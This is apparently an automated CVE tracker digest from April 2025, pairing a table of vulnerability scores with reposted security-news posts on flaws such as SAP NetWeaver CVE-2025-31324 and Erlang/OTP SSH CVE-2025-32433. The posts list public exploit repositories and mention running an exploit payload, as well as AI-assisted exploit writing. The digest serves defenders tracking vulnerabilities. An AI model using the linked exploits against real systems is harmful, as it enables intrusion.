##
Updated at UTC 2025-04-26T05:03:55.977040
CVE | CVSS | EPSS | Posts | Repos | Nuclei | Updated | Description |
---|---|---|---|---|---|---|---|
CVE-2025-31324 | 10.0 | 0.04% | 9 | 1 | 2025-04-26T01:15:41.930000 | SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper a | |
CVE-2025-32433 | 10.0 | 3.62% | 16 | 17 | template | 2025-04-25T23:15:16.993000 | Erlang/OTP is a set of libraries for the Erlang programming language. Prior to v |
CVE-2025-3935 | 8.1 | 0.00% | 2 | 0 | 2025-04-25T21:31:39 | ScreenConnect versions 25.2.3 and earlier versions may be susceptible to a ViewS | |
CVE-2025-2069 | 5.0 | 0.00% | 2 | 0 | 2025-04-25T18:31:19 | A cross-site scripting vulnerability was reported in the FileZ client that could | |
CVE-2025-3928 | 8.8 | 0.00% | 2 | 0 | 2025-04-25T18:31:12 | Commvault Web Server has an unspecified vulnerability that can be exploited by a | |
CVE-2025-3634 | 4.3 | 0.00% | 4 | 0 | 2025-04-25T16:30:58 | A security vulnerability was discovered in Moodle that allows students to enroll | |
CVE-2024-6199 | None | 0.00% | 2 | 0 | 2025-04-25T15:31:29 | An unauthenticated attacker on the WAN interface, with the ability to intercept | |
CVE-2024-6198 | None | 0.00% | 4 | 0 | 2025-04-25T15:31:29 | The device exposes a web interface on ports TCP/3030 and TCP/9882. This web serv | |
CVE-2025-43946 | 9.8 | 0.29% | 1 | 0 | 2025-04-25T15:31:21 | TCPWave DDI 11.34P1C2 allows Remote Code Execution via Unrestricted File Upload | |
CVE-2025-32431 | None | 0.07% | 1 | 0 | 2025-04-25T14:41:50 | ## Impact There is a potential vulnerability in Traefik managing the requests u | |
CVE-2025-46616 | 10.0 | 0.18% | 1 | 0 | 2025-04-25T09:31:56 | Quantum StorNext Web GUI API before 7.2.4 allows potential Arbitrary Remote Code | |
CVE-2025-43859 | 9.1 | 0.03% | 1 | 0 | 2025-04-24T21:41:39 | ### Impact A leniency in h11's parsing of line terminators in chunked-coding me | |
CVE-2024-32752 | 9.1 | 0.21% | 1 | 0 | 2025-04-24T21:32:50 | Under certain circumstances communications between the ICU tool and an iSTAR Pro | |
CVE-2025-26382 | None | 0.04% | 2 | 0 | 2025-04-24T21:31:54 | Under certain circumstances the iSTAR Configuration Utility (ICU) tool could hav | |
CVE-2025-43858 | 9.2 | 0.02% | 1 | 0 | 2025-04-24T19:20:07 | ## Summary This vulnerability only apply when running on a Windows OS. An unsafe | |
CVE-2025-43928 | 5.8 | 0.04% | 2 | 0 | 2025-04-24T18:32:12 | In Infodraw Media Relay Service (MRS) 7.1.0.0, the MRS web server (on port 12654 | |
CVE-2025-28020 | 7.3 | 0.04% | 1 | 0 | 2025-04-24T18:32:10 | TOTOLINK A800R V4.1.2cu.5137_B20200730 was found to contain a buffer overflow vu | |
CVE-2025-28021 | 7.3 | 0.04% | 1 | 0 | 2025-04-24T18:32:10 | TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vu | |
CVE-2025-28028 | 7.3 | 0.04% | 1 | 0 | 2025-04-24T18:32:10 | TOTOLINK A830R V4.1.2cu.5182_B20201102, A950RG V4.1.2cu.5161_B20200903, A3000RU | |
CVE-2025-28022 | 7.3 | 0.04% | 1 | 0 | 2025-04-24T18:32:10 | TOTOLINK A810R V4.1.2cu.5182_B20201026 was found to contain a buffer overflow vu | |
CVE-2025-27820 | 7.5 | 0.01% | 1 | 0 | 2025-04-24T16:36:11 | A bug in PSL validation logic in Apache HttpClient 5.4.x disables domain checks, | |
CVE-2025-43919 | 5.8 | 0.16% | 3 | 2 | 2025-04-24T16:22:37.117000 | GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attac | |
CVE-2025-43920 | 5.4 | 0.12% | 2 | 1 | 2025-04-24T16:20:36.953000 | GNU Mailman 2.1.39, as bundled in cPanel (and WHM), in certain external archiver | |
CVE-2025-43921 | 5.3 | 0.03% | 3 | 1 | 2025-04-24T16:16:59.597000 | GNU Mailman 2.1.39, as bundled in cPanel (and WHM), allows unauthenticated attac | |
CVE-2025-43855 | None | 0.07% | 1 | 0 | 2025-04-24T16:03:58 | ### Summary An unhandled error is thrown when validating invalid connectionPara | |
CVE-2025-30408 | 6.7 | 0.01% | 1 | 0 | 2025-04-24T15:31:46 | Local privilege escalation due to insecure folder permissions. The following pro | |
CVE-2025-46421 | 6.8 | 0.03% | 1 | 0 | 2025-04-24T15:31:44 | A flaw was found in libsoup. When libsoup clients encounter an HTTP redirect, th | |
CVE-2025-30409 | 5.5 | 0.01% | 1 | 0 | 2025-04-24T15:31:44 | Denial of service due to allocation of resources without limits. The following p | |
CVE-2025-3872 | 7.2 | 0.02% | 1 | 0 | 2025-04-24T12:31:35 | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injecti | |
CVE-2024-12244 | 4.3 | 0.01% | 1 | 0 | 2025-04-24T09:30:40 | An issue has been discovered in access controls could allow users to view certai | |
CVE-2025-1908 | 7.7 | 0.01% | 1 | 0 | 2025-04-24T09:30:40 | An issue has been discovered in GitLab EE/CE that could allow an attacker to tra | |
CVE-2025-0639 | 6.5 | 0.03% | 1 | 0 | 2025-04-24T09:30:40 | An issue has been discovered affecting service availability via issue preview in | |
CVE-2025-32730 | 5.5 | 0.03% | 1 | 0 | 2025-04-24T09:30:40 | Use of hard-coded cryptographic key vulnerability in i-PRO Configuration Tool af | |
CVE-2025-1731 | 7.8 | 0.01% | 4 | 0 | 2025-04-24T06:30:31 | An incorrect permission assignment vulnerability in the PostgreSQL commands of t | |
CVE-2025-1976 | None | 0.03% | 1 | 0 | 2025-04-24T03:31:38 | Brocade Fabric OS versions starting with 9.1.0 have root access removed, however | |
CVE-2025-46419 | 5.9 | 0.06% | 1 | 0 | 2025-04-24T03:31:38 | Westermo WeOS 5 through 5.23.0 allows a reboot via a malformed ESP packet. | |
CVE-2025-32818 | 7.5 | 0.04% | 1 | 0 | 2025-04-23T21:30:42 | A Null Pointer Dereference vulnerability in the SonicOS SSLVPN Virtual office in | |
CVE-2025-32969 | None | 0.24% | 1 | 0 | 2025-04-23T19:15:38 | ### Impact It is possible for a remote unauthenticated user to escape from the | |
CVE-2025-2773 | 7.2 | 0.33% | 1 | 0 | 2025-04-23T18:31:07 | BEC Technologies Multiple Routers sys ping Command Injection Remote Code Executi | |
CVE-2025-2772 | 5.3 | 0.03% | 1 | 0 | 2025-04-23T18:31:07 | BEC Technologies Multiple Routers Insufficiently Protected Credentials Informati | |
CVE-2025-2770 | 4.9 | 0.10% | 1 | 0 | 2025-04-23T18:31:06 | BEC Technologies Multiple Routers Cleartext Password Storage Information Disclos | |
CVE-2025-2771 | 5.3 | 0.10% | 1 | 0 | 2025-04-23T18:31:06 | BEC Technologies Multiple Routers Authentication Bypass Vulnerability. This vuln | |
CVE-2025-2767 | 8.8 | 0.21% | 1 | 0 | 2025-04-23T18:31:00 | Arista NG Firewall User-Agent Cross-Site Scripting Remote Code Execution Vulnera | |
CVE-2025-27087 | 5.5 | 0.01% | 1 | 0 | 2025-04-23T15:32:02 | A vulnerability in the kernel of the Cray Operating System (COS) could allow an | |
CVE-2024-33452 | 7.7 | 0.11% | 1 | 0 | 2025-04-23T14:08:13.383000 | An issue in OpenResty lua-nginx-module v.0.10.26 and before allows a remote atta | |
CVE-2025-1951 | 8.4 | 0.01% | 1 | 0 | 2025-04-23T14:08:13.383000 | IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 co | |
CVE-2025-29660 | 9.8 | 0.07% | 1 | 0 | 2025-04-23T14:08:13.383000 | A vulnerability exists in the daemon process of the Yi IOT XY-3820 v6.0.24.10, w | |
CVE-2025-29659 | 9.8 | 0.21% | 1 | 0 | 2025-04-23T14:08:13.383000 | Yi IOT XY-3820 6.0.24.10 is vulnerable to Remote Command Execution via the "cmd_ | |
CVE-2025-2703 | 6.8 | 0.01% | 2 | 0 | 2025-04-23T12:31:31 | The built-in XY Chart plugin is vulnerable to a DOM XSS vulnerability. A user | |
CVE-2025-2595 | 5.3 | 0.02% | 1 | 0 | 2025-04-23T09:33:37 | An unauthenticated remote attacker can bypass the user management in CODESYS Vis | |
CVE-2025-0926 | 5.9 | 0.01% | 1 | 0 | 2025-04-23T06:31:26 | Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has found that | |
CVE-2025-1056 | 6.1 | 0.01% | 1 | 0 | 2025-04-23T06:31:26 | Gee-netics, member of AXIS Camera Station Pro Bug Bounty Program, has identified | |
CVE-2025-46221 | None | 0.00% | 1 | 0 | 2025-04-23T03:30:35 | Rejected reason: Not used | |
CVE-2025-1021 | 7.5 | 0.04% | 1 | 0 | 2025-04-23T03:30:30 | Missing authorization vulnerability in synocopy in Synology DiskStation Manager | |
CVE-2025-32965 | None | 0.04% | 1 | 1 | 2025-04-22T23:53:56 | ### Impact Versions 4.2.1, 4.2.2, 4.2.3, and 4.2.4 of xrpl.js were compromised a | |
CVE-2025-34028 | 10.0 | 0.31% | 13 | 2 | 2025-04-22T18:32:18 | A path traversal vulnerability in Commvault Command Center Innovation Release al | |
CVE-2025-27086 | 8.1 | 0.06% | 2 | 0 | 2025-04-22T15:31:59 | Vulnerability in Hewlett Packard Enterprise HPE Performance Cluster Manager (HPC | |
CVE-2025-1950 | 9.4 | 0.01% | 2 | 0 | 2025-04-22T15:30:58 | IBM Hardware Management Console - Power Systems V10.2.1030.0 and V10.3.1050.0 co | |
CVE-2025-1732 | 6.7 | 0.01% | 1 | 0 | 2025-04-22T03:30:32 | An improper privilege management vulnerability in the recovery function of the U | |
CVE-2025-43972 | 6.8 | 0.06% | 1 | 0 | 2025-04-21T21:55:34 | An issue was discovered in GoBGP before 3.35.0. An attacker can cause a crash in | |
CVE-2025-43971 | 8.6 | 0.04% | 1 | 0 | 2025-04-21T21:55:26 | An issue was discovered in GoBGP before 3.35.0. pkg/packet/bgp/bgp.go allows att | |
CVE-2025-43970 | 4.3 | 0.02% | 1 | 0 | 2025-04-21T21:55:19 | An issue was discovered in GoBGP before 3.35.0. pkg/packet/mrt/mrt.go does not p | |
CVE-2025-32408 | 2.5 | 0.01% | 1 | 0 | 2025-04-21T17:15:24.117000 | In Soffid Console 3.6.31 before 3.6.32, authorization to use the pam service is | |
CVE-2025-43916 | 3.4 | 0.03% | 1 | 0 | 2025-04-21T14:23:45.950000 | Sonos api.sonos.com through 2025-04-21, when the /login/v3/oauth endpoint is use | |
CVE-2025-43973 | 6.8 | 0.04% | 1 | 0 | 2025-04-21T14:23:45.950000 | An issue was discovered in GoBGP before 3.35.0. pkg/packet/rtr/rtr.go does not v | |
CVE-2025-43918 | 6.4 | 0.01% | 1 | 0 | 2025-04-20T00:31:48 | SSL.com before 2025-04-19, when domain validation method 3.2.2.4.14 is used, pro | |
CVE-2025-3803 | 8.8 | 0.05% | 1 | 0 | 2025-04-19T15:30:28 | A vulnerability was found in Tenda W12 and i24 3.0.0.4(2887)/3.0.0.5(3644). It h | |
CVE-2025-3802 | 8.8 | 0.05% | 1 | 0 | 2025-04-19T15:30:23 | A vulnerability was found in Tenda W12 and i24 3.0.0.4(2887)/3.0.0.5(3644). It h | |
CVE-2025-32434 | None | 0.41% | 2 | 0 | 2025-04-18T18:34:25 | # Description I found a Remote Command Execution (RCE) vulnerability in the PyTo | |
CVE-2025-42599 | 9.8 | 0.30% | 2 | 0 | 2025-04-18T15:31:44 | Active! mail 6 BuildInfo: 6.60.05008561 and earlier contains a stack-based buffe | |
CVE-2025-24054 | 6.5 | 17.54% | 4 | 3 | 2025-04-18T14:15:17.677000 | External control of file name or path in Windows NTLM allows an unauthorized att | |
CVE-2025-2567 | 9.8 | 0.05% | 1 | 0 | 2025-04-15T21:31:48 | An attacker could modify or disable settings, disrupt fuel monitoring and suppl | |
CVE-2025-3587 | 6.3 | 0.04% | 1 | 0 | 2025-04-15T18:39:27.967000 | A vulnerability classified as critical was found in ZeroWdd/code-projects studen | |
CVE-2025-33028 | 6.1 | 0.04% | 1 | 0 | 2025-04-15T18:31:58 | In WinZip through 29.0, there is a Mark-of-the-Web Bypass Vulnerability because | |
CVE-2025-2636 | 9.8 | 0.25% | 1 | 0 | 2025-04-11T15:39:52.920000 | The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vul | |
CVE-2025-0120 | 0 | 0.02% | 1 | 0 | 2025-04-11T15:39:52.920000 | A vulnerability with a privilege management mechanism in the Palo Alto Networks | |
CVE-2025-3248 | 9.8 | 80.91% | 2 | 4 | template | 2025-04-10T01:59:49 | Langflow versions prior to 1.3.0 are susceptible to code injection in the `/api/ |
CVE-2025-21204 | 7.8 | 0.07% | 4 | 0 | 2025-04-08T18:34:49 | Improper link resolution before file access ('link following') in Windows Update | |
CVE-2024-48887 | 9.8 | 0.09% | 1 | 2 | 2025-04-08T18:34:48 | A unverified password change vulnerability in Fortinet FortiSwitch GUI may allo | |
CVE-2025-29927 | 9.1 | 92.56% | 1 | 81 | template | 2025-03-28T15:32:59 | # Impact It is possible to bypass authorization checks within a Next.js applicat |
CVE-2024-54085 | None | 0.11% | 1 | 0 | 2025-03-28T15:32:58 | AMI’s SPx contains a vulnerability in the BMC where an Attacker may bypass authe | |
CVE-2025-1974 | 9.8 | 80.23% | 1 | 17 | template | 2025-03-25T15:10:16 | A security issue was discovered in Kubernetes where under certain conditions, an |
CVE-2025-27840 | 6.8 | 0.07% | 1 | 3 | 2025-03-11T18:32:12 | Espressif ESP32 chips allow 29 hidden HCI commands, such as 0xFC02 (Write memory | |
CVE-2025-27610 | 7.5 | 0.09% | 6 | 0 | 2025-03-10T23:15:35.073000 | Rack provides an interface for developing web applications in Ruby. Prior to ver | |
CVE-2025-0725 | 7.3 | 0.21% | 1 | 0 | 2025-03-07T03:31:33 | When libcurl is asked to perform automatic gzip decompression of content-encoded | |
CVE-2025-27111 | 0 | 0.12% | 4 | 0 | 2025-03-04T16:15:40.487000 | Rack is a modular Ruby web server interface. The Rack::Sendfile middleware logs | |
CVE-2022-42475 | 9.8 | 93.18% | 1 | 7 | 2025-02-24T18:32:12 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN 7.2.0 th | |
CVE-2025-25184 | 0 | 0.10% | 4 | 0 | 2025-02-14T20:15:34.350000 | Rack provides an interface for developing web applications in Ruby. Prior to ver | |
CVE-2025-0282 | 9.1 | 92.34% | 7 | 10 | 2025-01-28T18:32:27 | A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.5, | |
CVE-2018-0171 | 9.8 | 89.10% | 1 | 2 | 2025-01-27T21:31:51 | A vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS | |
CVE-2024-21762 | 9.8 | 91.37% | 1 | 8 | 2024-11-29T15:23:32.167000 | A out-of-bounds write in Fortinet FortiOS versions 7.4.0 through 7.4.2, 7.2.0 th | |
CVE-2024-9441 | 9.8 | 57.36% | 1 | 4 | 2024-10-02T21:30:35 | The Linear eMerge e3-Series through version 1.00-07 is vulnerable to an OS comma | |
CVE-2024-6235 | None | 21.21% | 1 | 0 | template | 2024-07-31T05:02:58 | Sensitive information disclosure in NetScaler Console |
CVE-2020-5902 | 9.8 | 94.44% | 1 | 57 | template | 2024-07-25T18:33:36 | In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3, 12.1.0-12. |
CVE-2024-6407 | 9.8 | 0.14% | 1 | 0 | 2024-07-11T12:30:56 | CWE-200: Information Exposure vulnerability exists that could cause disclosure o | |
CVE-2023-27997 | 9.8 | 91.01% | 1 | 10 | 2024-04-04T04:45:33 | A heap-based buffer overflow vulnerability [CWE-122] in FortiOS version 7.2.4 an | |
CVE-2024-3094 | 10.0 | 90.84% | 1 | 62 | template | 2024-03-29T18:30:50 | Malicious code was discovered in the upstream tarballs of xz, starting with vers |
CVE-2022-42889 | 9.8 | 94.16% | 1 | 49 | template | 2024-01-19T20:49:34 | Apache Commons Text performs variable interpolation, allowing properties to be d |
CVE-2025-3132 | 0 | 0.00% | 2 | 1 | N/A | ||
CVE-2025-22234 | 0 | 0.00% | 3 | 0 | N/A | ||
CVE-2025-1763 | 0 | 0.00% | 1 | 0 | N/A | ||
CVE-2025-2443 | 0 | 0.00% | 1 | 0 | N/A | ||
CVE-2024-55571 | 0 | 0.00% | 1 | 0 | N/A | ||
CVE-2025-21605 | 0 | 0.03% | 1 | 0 | N/A | ||
CVE-2025-32966 | 0 | 0.04% | 1 | 0 | N/A | ||
CVE-2025-32958 | 0 | 0.04% | 1 | 0 | N/A | ||
CVE-2025-32438 | 0 | 0.01% | 1 | 0 | N/A |
updated 2025-04-26T01:15:41.930000
9 posts
1 repos
SAP zero-day vulnerability under widespread active exploitation https://cyberscoop.com/sap-netweaver-zero-day-exploit-cve-2025-31324/
##More about the SAP NetWeaver zero-day vulnerability. A patch has been released.
Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild https://www.tenable.com/blog/cve-2025-31324-zero-day-vulnerability-in-sap-netweaver-exploited-in-the-wild @tenable #cybersecurity #infosec #zeroday
##@campuscodi I have heard that CVE-2025-31324 is in fact under active exploitation. I haven't heard confirmation that the exploitation observed by ReliaQuest in that article is it, but at this point, it doesn't ( or at least shouldn't ) matter to defenders.
##SAP zero-day vulnerability under widespread active exploitation https://cyberscoop.com/sap-netweaver-zero-day-exploit-cve-2025-31324/
##More about the SAP NetWeaver zero-day vulnerability. A patch has been released.
Tenable: CVE-2025-31324: Zero-Day Vulnerability in SAP NetWeaver Exploited in the Wild https://www.tenable.com/blog/cve-2025-31324-zero-day-vulnerability-in-sap-netweaver-exploited-in-the-wild @tenable #cybersecurity #infosec #zeroday
##@campuscodi I have heard that CVE-2025-31324 is in fact under active exploitation. I haven't heard confirmation that the exploitation observed by ReliaQuest in that article is it, but at this point, it doesn't ( or at least shouldn't ) matter to defenders.
##Tracked as CVE-2025-31324 (CVSS score of 10/10), the security defect is described as the lack of proper authorization (missing authorization check) in the Visual Composer Metadata Uploader component of SAP NetWeaver. https://www.securityweek.com/sap-zero-day-possibly-exploited-by-initial-access-broker/
##🚨SAP NetWeaver Vulnerability (CVE-2025-31324) Allows Remote Code Execution via File Upload Flaw
##A perfect 10 in SAP NetWeaver? Yes please. 🥳
https://me.sap.com/notes/3594142
sev:CRIT 10.0 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
##SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
updated 2025-04-25T23:15:16.993000
16 posts
17 repos
https://github.com/exa-offsec/ssh_erlangotp_rce
https://github.com/m0usem0use/erl_mouse
https://github.com/becrevex/CVE-2025-32433
https://github.com/rizky412/CVE-2025-32433
https://github.com/ekomsSavior/POC_CVE-2025-32433
https://github.com/ProDefense/CVE-2025-32433
https://github.com/omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC
https://github.com/Epivalent/CVE-2025-32433-detection
https://github.com/ps-interactive/lab_CVE-2025-32433
https://github.com/TeneBrae93/CVE-2025-3243
https://github.com/meloppeitreet/CVE-2025-32433-Remote-Shell
https://github.com/LemieOne/CVE-2025-32433
https://github.com/tobiasGuta/Erlang-OTP-CVE-2025-32433
https://github.com/teamtopkarl/CVE-2025-32433
https://github.com/darses/CVE-2025-32433
Cisco updated the list again. Here are the currently listed Cisco system vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433 ( additions in bold:
The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):
This was updated yesterday.
Cisco: Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server - CVE-2025-32433: April 2025 (critical) https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-erlang-otp-ssh-xyZZy @TalosSecurity #cybersecurity #infosec
##For those playing along at home, here are the currently listed Cisco system vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433:
The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):
Cisco updated the list again. Here are the currently listed Cisco system vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433 ( additions in bold:
The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):
This was updated yesterday.
Cisco: Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server - CVE-2025-32433: April 2025 (critical) https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-erlang-otp-ssh-xyZZy @TalosSecurity #cybersecurity #infosec
##For those playing along at home, here are the currently listed Cisco system vulnerable to the Erlang / OTP perfect 10 CVE-2025-32433:
The products still being evaluated, hopefully to be complete by EoD today ( my hope, nothing hinting to that from Cisco ):
Cisco is investigating the impact of the Erlang/OTP remote code execution vulnerability CVE-2025-32433 on its products. https://www.securityweek.com/cisco-confirms-some-products-impacted-by-critical-erlang-otp-flaw/
##A few quick notes on the Erlang OTP SSHd RCE (CVE-2025-32433):
1. Cisco confirmed that ConfD and NSO products are affected (ports 830, 2022, and 2024 versus 22)
2. Signatures looking for clear-text channel open and exec calls will miss exploits that deliver the same payloads after the key exchange.
3. If you find a machine in your environment and can't disable the service, running the exploit with the payload `ssh:stop().` will shut down the SSH service temporarily.
##How I Used AI to Create a Working Exploit for CVE-2025-32433 Before Public PoCs Existed | Platform Security Blog https://platformsecurity.com/blog/CVE-2025-32433-poc
##Cisco, published yesterday (critical): Multiple Cisco Products Unauthenticated Remote Code Execution in Erlang/OTP SSH Server - CVE-2025-32433 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-erlang-otp-ssh-xyZZy @TalosSecurity #cybersecurity #infosec
##If your company sells a product with limited visibility into the underlying systems ( network appliances, etc. ) and you have not yet published an advisory or doc stating whether or not your products are impacted by the Erlang / OTP perfect 10 CVE-2025-32433, then you are not my friend and I hope you step on a lego in the middle of the night.
##The Register: Today’s LLMs craft exploits from patches at lightning speed . “Matthew Keely, of Platform Security and penetration testing firm ProDefense, managed to cobble together a working exploit for a critical vulnerability in Erlang’s SSH library (CVE-2025-32433) in an afternoon, although the AI he used had some help – the model was able to use code from an already published patch in the […]
##PoC exploit for critical Erlang/OTP SSH bug is public (CVE-2025-32433) https://www.helpnetsecurity.com/2025/04/22/working-poc-exploit-for-critical-erlang-otp-ssh-bug-is-public-cve-2025-32433/ #RuhrUniversityBochum #ArcticWolfNetworks #PlatformSecurity #vulnerability #Horizon3ai #ProDefense #Don'tmiss #Hotstuff #exploit #News #PoC #SSH
##Erlang/OTP RCE (CVE-2025-32433) https://fortiguard.fortinet.com/threat-signal-report/6077
##Critical Erlang/OTP SSH RCE bug now has public exploits, patch now
Public exploits are now available for a critical Erlang/OTP SSH vulnerability tracked as CVE-2025-32433, allowing unauthenticated attackers to...
🔗️ [Bleepingcomputer] https://link.is.it/weapzq
##Picus: CVE-2025-32433: Erlang/OTP SSH Remote Code Execution Vulnerability Explained https://www.picussecurity.com/resource/blog/cve-2025-32433-erlang-otp-ssh-remote-code-execution-vulnerability-explained #cybersecurity #Infosec
##updated 2025-04-25T21:31:39
2 posts
Looks like there's a CVE for yesterday's ScreenConnect vuln now.
##Looks like there's a CVE for yesterday's ScreenConnect vuln now.
##updated 2025-04-25T18:31:19
2 posts
Three vulns published in FileZ, all sev:MED 5.1
but this one sounded more interesting:
FileZ 客户端报告了一个跨站脚本攻击漏洞,如果本地用户访问伪造的链接,则可能会执行代码。CVE-2025-2069
Translation via LibreWolf:
##The FileZ client reported a cross-site scripting vulnerability that could execute code if a local user accesses a forged link. CVE-2025-2069
Three vulns published in FileZ, all sev:MED 5.1
but this one sounded more interesting:
FileZ 客户端报告了一个跨站脚本攻击漏洞,如果本地用户访问伪造的链接,则可能会执行代码。CVE-2025-2069
Translation via LibreWolf:
##The FileZ client reported a cross-site scripting vulnerability that could execute code if a local user accesses a forged link. CVE-2025-2069
updated 2025-04-25T18:31:12
2 posts
CVE published for a Commvault advisory from last month about "an unspecifiec vulnerability".
https://documentation.commvault.com/securityadvisories/CV_2025_03_1.html
sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
##Commvault Web Server has an unspecified vulnerability that can be exploited by a remote, authenticated attacker. According to the Commvault advisory: "Webservers can be compromised through bad actors creating and executing webshells." Fixed in version 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux platforms.
CVE published for a Commvault advisory from last month about "an unspecifiec vulnerability".
https://documentation.commvault.com/securityadvisories/CV_2025_03_1.html
sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
##Commvault Web Server has an unspecified vulnerability that can be exploited by a remote, authenticated attacker. According to the Commvault advisory: "Webservers can be compromised through bad actors creating and executing webshells." Fixed in version 11.36.46, 11.32.89, 11.28.141, and 11.20.217 for Windows and Linux platforms.
updated 2025-04-25T16:30:58
4 posts
"Zu viel Interesse an Moodle-Kursen" ist eher kein so gängiges Sicherheitsproblem an Unis, oder? https://access.redhat.com/security/cve/CVE-2025-3634 #Moodle #CVE
##Who wants to skip courses in Moodle?
https://access.redhat.com/security/cve/CVE-2025-3634
##A security vulnerability was discovered in Moodle that allows students to enroll themselves in courses without completing all the necessary safety checks. Specifically, users can sign up for courses prematurely, even if they haven't finished two-step verification processes.
"Zu viel Interesse an Moodle-Kursen" ist eher kein so gängiges Sicherheitsproblem an Unis, oder? https://access.redhat.com/security/cve/CVE-2025-3634 #Moodle #CVE
##Who wants to skip courses in Moodle?
https://access.redhat.com/security/cve/CVE-2025-3634
##A security vulnerability was discovered in Moodle that allows students to enroll themselves in courses without completing all the necessary safety checks. Specifically, users can sign up for courses prematurely, even if they haven't finished two-step verification processes.
updated 2025-04-25T15:31:29
2 posts
Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.
https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198
sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red
The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.
https://nvd.nist.gov/vuln/detail/CVE-2024-6198
https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6199
sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red
##An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.
Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.
https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198
sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red
The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.
https://nvd.nist.gov/vuln/detail/CVE-2024-6198
https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6199
sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red
##An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.
updated 2025-04-25T15:31:29
4 posts
Who doesn't like RCE in Viastat modems? Well here's two of them. Happy Friday.
https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198
sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/R:U/V:C/RE:M/U:Red
The device exposes a web interface on ports TCP/3030 and TCP/9882. This web service runs lighttpd, which implements the “SNORE” interface. This interface is affected by a stack buffer overflow vulnerability due to insecure path parsing. An attacker with access to the LAN network interface could use a specially crafted HTTP request to exploit a buffer overflow on the modem.
https://nvd.nist.gov/vuln/detail/CVE-2024-6198
https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6199
sev:HIGH 7.7 - CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:N/R:U/V:D/RE:M/U:Red
##An unauthenticated attacker on the WAN interface, with the ability to intercept Dynamic DNS (DDNS) traffic between DDNS services and the modem, could manipulate specific responses to include code that forces a buffer overflow on the modem. Customers that have not enabled Dynamic DNS on their modem are not vulnerable.
Remote Code Execution on Viasat Modems (CVE-2024-6198) https://www.onekey.com/resource/security-advisory-rce-on-viasat-modems-cve-2024-6198
